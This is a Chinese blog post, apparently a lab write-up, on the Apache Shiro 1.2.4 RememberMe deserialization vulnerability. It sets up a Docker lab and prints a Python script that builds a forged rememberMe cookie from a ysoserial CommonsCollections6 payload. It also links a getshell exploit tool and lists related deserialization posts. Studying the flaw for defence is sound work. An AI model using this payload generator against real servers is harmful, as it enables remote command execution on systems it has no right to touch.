2. 程式人生 > 其它 >Shiro1.2.4RememberMe反序列化漏洞

Shiro1.2.4RememberMe反序列化漏洞

阿新 發佈:2021-07-10

Shiro1.2.4RememberMe反序列化漏洞

針對Shiro版本1.2.4以下有效,Shiro是一個java框架

漏洞原理

Apache Shiro 有記住密碼的功能,在登入成功後會生成欄位setcookie

而這個cookie值是經過序列化---AES加密---base64編碼得到

而在Shiro<1.2.4檔案中可以找到預設的aes金鑰,導致可以偽造這個cookie,導致反序列化漏洞

環境搭建

直接採用docker搭建shiro環境

docker pull medicean/vulapps:s_shiro_1
docker run -d -p 80:8080 -p 7777:6666 medicean/vulapps:s_shiro_1
訪問127.0.0.1

登入時點選記住密碼,抓包後發到repeater

可以看到服務端setcookie中的rememberme欄位

生成payload指令碼

# -- coding: utf-8 --
import sys
import uuid  #匯入唯一標識庫
import base64
import subprocess
from Crypto.Cipher import AES  #匯入aes


def encode(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'CommonsCollects6', command], stdout=subprocess.PIPE)   #建立一個子程序,輸出到管道中
    bs = AES.block_size
    pad = lambda s: s + ((bs - len(s) % bs) * chr(bs - len(s) % bs)).encode()  #演算法
    key = base64.b64decode("")
    iv = uuid.uuid4().bytes  #生成初始向量
    encryptor  = AES.new(key,AES.MODE_CBC,iv)  #初始化aes
    file_body = pad(popen.stdout.read())    #從pipe中讀資料放入加密演算法
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode(sys.argv[1])   #獲取外部輸入的第一個引數
    print 'rememberMe={}'.format(payload.decode())

https://toscode.gitee.com/lmdy/ShiroExploit 【利用漏洞getshell工具】

https://www.xpshuai.cn/posts/40239/#toc-heading-10【參考連結】

相關推薦

Shiro1.2.4RememberMe序列漏洞

Shiro1.2.4RememberMe序列漏洞 針對Shiro版本1.2.4以下有效,Shiro是一個java框架 漏洞原理

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)

0x01簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437) 復現

前言 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

漏洞除錯】fastjson1.2.24序列漏洞復現-mac版

1 漏洞原理 Fastjson支援在json資料中使用@type屬性指定該json資料被序列為什麼型別的物件。說明在序列物件時,會執行javabean的setter方法為其屬性賦值。

漏洞復現】Shiro<=1.2.4序列漏洞

0x01 概述 Shiro簡介 Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。使用Shiro的易於理解的API,您可以快速、輕鬆地獲得任何應用程式,從最小的移動應用程式到最大的網路和企業

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)復現

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)復現 環境搭建 docker pull medicean/vulapps:s_shiro_1

Fastjson <= 1.2.47 序列漏洞復現

0x01 前言 Fastjson 是一個 Java 語言編寫的高效能功能完善的 JSON 庫,可以將 Java 物件轉換為 JSON 格式,也可以將 JSON 字串轉換為 Java 物件,在中國和美國使用較為廣泛。

Fastjson 1.2.24 序列漏洞研究

一、概述   fastjson自2017年爆出序列漏洞以來,漏洞就一直停不下來。本次主要研究2017年第一次爆出序列漏洞

漏洞復現 - Apache Shiro 1.2.4序列漏洞(CVE-2016-4437)

漏洞原理 Apache Shiro 是 Java 的一個安全框架,可以幫助我們完成:認證、授權、加密、會話管理、與 Web 整合、快取等功能,應用十分廣泛。

【高危安全通告】fastjson≤1.2.80序列漏洞

近日Fastjson Develop Team釋出安全公告,Fastjson≤1.2.80版本中存在序列漏洞。攻擊者可繞過預設autoType關閉限制,攻擊遠端伺服器,風險影響較大。

【JNPF修改通告】fastjson≤1.2.80序列漏洞

近日Fastjson Develop Team 發現 fastjson 1.2.80及以下存在新的風險,存在序列漏洞。攻擊者可繞過預設autoType關閉限制,攻擊遠端伺服器,風險影響較大,請大家關注。

Apache Shiro<=1.2.4序列RCE漏洞

版本:Apache Shiro<=1.2.4 介紹:Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。

Fastjson 1.2.22-24 序列漏洞分析(2

Fastjson 1.2.22-24 序列漏洞分析(2) 1.環境搭建 我們以ubuntu作為被攻擊的伺服器,本機電腦作為攻擊者

Shiro序列漏洞利用匯總(Shiro-550+Shiro-721)

Apache Shiro是一個強大易用的Java安全框架,提供了認證、授權、加密和會話管理等功能。Shiro框架直觀、易用,同時也能提供健壯的安全性。

原來不只是fastjson,這個你每天都在用的類庫也被爆過序列漏洞

GitHub 15.8k Star 的Java工程師成神之路,不來瞭解一下嗎! GitHub 15.8k Star 的Java工程師成神之路,真的不來瞭解一下嗎!

PHP 序列漏洞入門學習筆記

參考文章: PHP序列漏洞入門 easy_serialize_php wp 實戰經驗丨PHP序列漏洞總結

jboss序列漏洞復現(CVE-2017-7504)

0x01 環境 使用vulhub搭建:/vulhub-master/jboss/CVE-2017-7504 漏洞點:http://192.168.255.130:8080/jbossmq-httpil/HTTPServerILServlet

Shiro remeberMe序列漏洞復現(Shiro-550)

Apache Shiro是一個強大易用的Java安全框架,提供了認證、授權、加密和會話管理等功能。Shiro框架直觀、易用,同時也能提供健壯的安全性。在Apache Shiro編號為550的 issue 中爆出嚴重的 Java 反序列化漏洞

CVE-2020-14644 weblogic iiop序列漏洞

0x00 weblogic 受影響版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 0x01 環境準備

CVE-2020-9496 apache ofbiz xml-rpc序列漏洞分析

0x00 apache ofbiz介紹 OFBiz是一個非常著名的電子商務平臺,是一個非常著名的開源專案,提供了建立基於最新J2EE/XML規範和技術標準,構建大中型企業級、跨平臺、跨資料庫、跨應用伺服器的多層、分散式電子商務類WEB